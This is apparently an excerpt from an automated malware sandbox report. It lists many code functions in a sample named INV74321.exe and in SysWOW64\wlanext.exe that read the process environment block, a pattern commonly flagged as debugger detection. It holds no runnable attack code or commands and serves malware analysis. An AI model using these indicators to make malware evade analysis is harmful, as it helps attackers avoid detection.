          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEEF40 mov eax, dword ptr fs:[00000030h]1_2_00AEEF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380138A mov eax, dword ptr fs:[00000030h]8_2_0380138A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03773B7A mov eax, dword ptr fs:[00000030h]8_2_03773B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03773B7A mov eax, dword ptr fs:[00000030h]8_2_03773B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374DB60 mov ecx, dword ptr fs:[00000030h]8_2_0374DB60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03815BA5 mov eax, dword ptr fs:[00000030h]8_2_03815BA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374F358 mov eax, dword ptr fs:[00000030h]8_2_0374F358
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374DB40 mov eax, dword ptr fs:[00000030h]8_2_0374DB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037703E2 mov eax, dword ptr fs:[00000030h]8_2_037703E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380131B mov eax, dword ptr fs:[00000030h]8_2_0380131B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376DBE9 mov eax, dword ptr fs:[00000030h]8_2_0376DBE9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C53CA mov eax, dword ptr fs:[00000030h]8_2_037C53CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C53CA mov eax, dword ptr fs:[00000030h]8_2_037C53CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818B58 mov eax, dword ptr fs:[00000030h]8_2_03818B58
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]8_2_03774BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]8_2_03774BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774BAD mov eax, dword ptr fs:[00000030h]8_2_03774BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772397 mov eax, dword ptr fs:[00000030h]8_2_03772397
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377B390 mov eax, dword ptr fs:[00000030h]8_2_0377B390
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03751B8F mov eax, dword ptr fs:[00000030h]8_2_03751B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03751B8F mov eax, dword ptr fs:[00000030h]8_2_03751B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FD380 mov ecx, dword ptr fs:[00000030h]8_2_037FD380
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0378927A mov eax, dword ptr fs:[00000030h]8_2_0378927A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FB260 mov eax, dword ptr fs:[00000030h]8_2_037FB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FB260 mov eax, dword ptr fs:[00000030h]8_2_037FB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037D4257 mov eax, dword ptr fs:[00000030h]8_2_037D4257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]8_2_03749240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]8_2_03749240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]8_2_03749240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749240 mov eax, dword ptr fs:[00000030h]8_2_03749240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03784A2C mov eax, dword ptr fs:[00000030h]8_2_03784A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03784A2C mov eax, dword ptr fs:[00000030h]8_2_03784A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374AA16 mov eax, dword ptr fs:[00000030h]8_2_0374AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374AA16 mov eax, dword ptr fs:[00000030h]8_2_0374AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]8_2_03745210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov ecx, dword ptr fs:[00000030h]8_2_03745210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]8_2_03745210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03745210 mov eax, dword ptr fs:[00000030h]8_2_03745210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03763A1C mov eax, dword ptr fs:[00000030h]8_2_03763A1C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03758A0A mov eax, dword ptr fs:[00000030h]8_2_03758A0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772AE4 mov eax, dword ptr fs:[00000030h]8_2_03772AE4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AA16 mov eax, dword ptr fs:[00000030h]8_2_0380AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AA16 mov eax, dword ptr fs:[00000030h]8_2_0380AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772ACB mov eax, dword ptr fs:[00000030h]8_2_03772ACB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375AAB0 mov eax, dword ptr fs:[00000030h]8_2_0375AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375AAB0 mov eax, dword ptr fs:[00000030h]8_2_0375AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377FAB0 mov eax, dword ptr fs:[00000030h]8_2_0377FAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]8_2_037452A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]8_2_037452A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]8_2_037452A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]8_2_037452A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037452A5 mov eax, dword ptr fs:[00000030h]8_2_037452A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380EA55 mov eax, dword ptr fs:[00000030h]8_2_0380EA55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377D294 mov eax, dword ptr fs:[00000030h]8_2_0377D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377D294 mov eax, dword ptr fs:[00000030h]8_2_0377D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818A62 mov eax, dword ptr fs:[00000030h]8_2_03818A62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B171 mov eax, dword ptr fs:[00000030h]8_2_0374B171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B171 mov eax, dword ptr fs:[00000030h]8_2_0374B171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374C962 mov eax, dword ptr fs:[00000030h]8_2_0374C962
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376B944 mov eax, dword ptr fs:[00000030h]8_2_0376B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376B944 mov eax, dword ptr fs:[00000030h]8_2_0376B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377513A mov eax, dword ptr fs:[00000030h]8_2_0377513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377513A mov eax, dword ptr fs:[00000030h]8_2_0377513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov eax, dword ptr fs:[00000030h]8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03764120 mov ecx, dword ptr fs:[00000030h]8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]8_2_03749100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]8_2_03749100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749100 mov eax, dword ptr fs:[00000030h]8_2_03749100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037D41E8 mov eax, dword ptr fs:[00000030h]8_2_037D41E8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]8_2_0374B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]8_2_0374B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374B1E1 mov eax, dword ptr fs:[00000030h]8_2_0374B1E1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]8_2_037C51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]8_2_037C51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]8_2_037C51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C51BE mov eax, dword ptr fs:[00000030h]8_2_037C51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037761A0 mov eax, dword ptr fs:[00000030h]8_2_037761A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037761A0 mov eax, dword ptr fs:[00000030h]8_2_037761A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C69A6 mov eax, dword ptr fs:[00000030h]8_2_037C69A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03772990 mov eax, dword ptr fs:[00000030h]8_2_03772990
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A185 mov eax, dword ptr fs:[00000030h]8_2_0377A185
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376C182 mov eax, dword ptr fs:[00000030h]8_2_0376C182
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03760050 mov eax, dword ptr fs:[00000030h]8_2_03760050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03760050 mov eax, dword ptr fs:[00000030h]8_2_03760050
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]8_2_0377002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]8_2_0377002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]8_2_0377002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]8_2_0377002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377002D mov eax, dword ptr fs:[00000030h]8_2_0377002D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]8_2_0375B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]8_2_0375B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]8_2_0375B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375B02A mov eax, dword ptr fs:[00000030h]8_2_0375B02A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7016 mov eax, dword ptr fs:[00000030h]8_2_037C7016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7016 mov eax, dword ptr fs:[00000030h]8_2_037C7016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7016 mov eax, dword ptr fs:[00000030h]8_2_037C7016
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03814015 mov eax, dword ptr fs:[00000030h]8_2_03814015
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03814015 mov eax, dword ptr fs:[00000030h]8_2_03814015
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037458EC mov eax, dword ptr fs:[00000030h]8_2_037458EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]8_2_037DB8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov ecx, dword ptr fs:[00000030h]8_2_037DB8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]8_2_037DB8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]8_2_037DB8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]8_2_037DB8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DB8D0 mov eax, dword ptr fs:[00000030h]8_2_037DB8D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377F0BF mov ecx, dword ptr fs:[00000030h]8_2_0377F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377F0BF mov eax, dword ptr fs:[00000030h]8_2_0377F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377F0BF mov eax, dword ptr fs:[00000030h]8_2_0377F0BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037890AF mov eax, dword ptr fs:[00000030h]8_2_037890AF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]8_2_037720A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]8_2_037720A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]8_2_037720A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]8_2_037720A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]8_2_037720A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037720A0 mov eax, dword ptr fs:[00000030h]8_2_037720A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03802073 mov eax, dword ptr fs:[00000030h]8_2_03802073
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03749080 mov eax, dword ptr fs:[00000030h]8_2_03749080
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03811074 mov eax, dword ptr fs:[00000030h]8_2_03811074
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C3884 mov eax, dword ptr fs:[00000030h]8_2_037C3884
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C3884 mov eax, dword ptr fs:[00000030h]8_2_037C3884
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375FF60 mov eax, dword ptr fs:[00000030h]8_2_0375FF60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375EF40 mov eax, dword ptr fs:[00000030h]8_2_0375EF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377E730 mov eax, dword ptr fs:[00000030h]8_2_0377E730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03744F2E mov eax, dword ptr fs:[00000030h]8_2_03744F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03744F2E mov eax, dword ptr fs:[00000030h]8_2_03744F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376F716 mov eax, dword ptr fs:[00000030h]8_2_0376F716
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DFF10 mov eax, dword ptr fs:[00000030h]8_2_037DFF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DFF10 mov eax, dword ptr fs:[00000030h]8_2_037DFF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A70E mov eax, dword ptr fs:[00000030h]8_2_0377A70E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A70E mov eax, dword ptr fs:[00000030h]8_2_0377A70E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0381070D mov eax, dword ptr fs:[00000030h]8_2_0381070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0381070D mov eax, dword ptr fs:[00000030h]8_2_0381070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037837F5 mov eax, dword ptr fs:[00000030h]8_2_037837F5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03758794 mov eax, dword ptr fs:[00000030h]8_2_03758794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7794 mov eax, dword ptr fs:[00000030h]8_2_037C7794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7794 mov eax, dword ptr fs:[00000030h]8_2_037C7794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C7794 mov eax, dword ptr fs:[00000030h]8_2_037C7794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818F6A mov eax, dword ptr fs:[00000030h]8_2_03818F6A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]8_2_0376AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]8_2_0376AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]8_2_0376AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]8_2_0376AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376AE73 mov eax, dword ptr fs:[00000030h]8_2_0376AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375766D mov eax, dword ptr fs:[00000030h]8_2_0375766D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03810EA5 mov eax, dword ptr fs:[00000030h]8_2_03810EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03810EA5 mov eax, dword ptr fs:[00000030h]8_2_03810EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03810EA5 mov eax, dword ptr fs:[00000030h]8_2_03810EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]8_2_03757E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]8_2_03757E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]8_2_03757E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]8_2_03757E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]8_2_03757E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03757E41 mov eax, dword ptr fs:[00000030h]8_2_03757E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FFE3F mov eax, dword ptr fs:[00000030h]8_2_037FFE3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374E620 mov eax, dword ptr fs:[00000030h]8_2_0374E620
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818ED6 mov eax, dword ptr fs:[00000030h]8_2_03818ED6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A61C mov eax, dword ptr fs:[00000030h]8_2_0377A61C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0377A61C mov eax, dword ptr fs:[00000030h]8_2_0377A61C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374C600 mov eax, dword ptr fs:[00000030h]8_2_0374C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374C600 mov eax, dword ptr fs:[00000030h]8_2_0374C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374C600 mov eax, dword ptr fs:[00000030h]8_2_0374C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03778E00 mov eax, dword ptr fs:[00000030h]8_2_03778E00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03801608 mov eax, dword ptr fs:[00000030h]8_2_03801608
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037716E0 mov ecx, dword ptr fs:[00000030h]8_2_037716E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037576E2 mov eax, dword ptr fs:[00000030h]8_2_037576E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037736CC mov eax, dword ptr fs:[00000030h]8_2_037736CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037FFEC0 mov eax, dword ptr fs:[00000030h]8_2_037FFEC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03788EC7 mov eax, dword ptr fs:[00000030h]8_2_03788EC7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AE44 mov eax, dword ptr fs:[00000030h]8_2_0380AE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380AE44 mov eax, dword ptr fs:[00000030h]8_2_0380AE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C46A7 mov eax, dword ptr fs:[00000030h]8_2_037C46A7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037DFE87 mov eax, dword ptr fs:[00000030h]8_2_037DFE87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376C577 mov eax, dword ptr fs:[00000030h]8_2_0376C577
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0376C577 mov eax, dword ptr fs:[00000030h]8_2_0376C577
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03767D50 mov eax, dword ptr fs:[00000030h]8_2_03767D50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038105AC mov eax, dword ptr fs:[00000030h]8_2_038105AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_038105AC mov eax, dword ptr fs:[00000030h]8_2_038105AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03783D43 mov eax, dword ptr fs:[00000030h]8_2_03783D43
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C3540 mov eax, dword ptr fs:[00000030h]8_2_037C3540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03753D34 mov eax, dword ptr fs:[00000030h]8_2_03753D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0374AD30 mov eax, dword ptr fs:[00000030h]8_2_0374AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037CA537 mov eax, dword ptr fs:[00000030h]8_2_037CA537
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774D3B mov eax, dword ptr fs:[00000030h]8_2_03774D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774D3B mov eax, dword ptr fs:[00000030h]8_2_03774D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03774D3B mov eax, dword ptr fs:[00000030h]8_2_03774D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]8_2_0380FDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]8_2_0380FDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]8_2_0380FDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380FDE2 mov eax, dword ptr fs:[00000030h]8_2_0380FDE2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037F8DF1 mov eax, dword ptr fs:[00000030h]8_2_037F8DF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375D5E0 mov eax, dword ptr fs:[00000030h]8_2_0375D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0375D5E0 mov eax, dword ptr fs:[00000030h]8_2_0375D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03818D34 mov eax, dword ptr fs:[00000030h]8_2_03818D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]8_2_037C6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]8_2_037C6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]8_2_037C6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov ecx, dword ptr fs:[00000030h]8_2_037C6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]8_2_037C6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_037C6DC9 mov eax, dword ptr fs:[00000030h]8_2_037C6DC9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_0380E539 mov eax, dword ptr fs:[00000030h]8_2_0380E539
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 8_2_03771DB5 mov eax, dword ptr fs:[00000030h]8_2_03771DB5
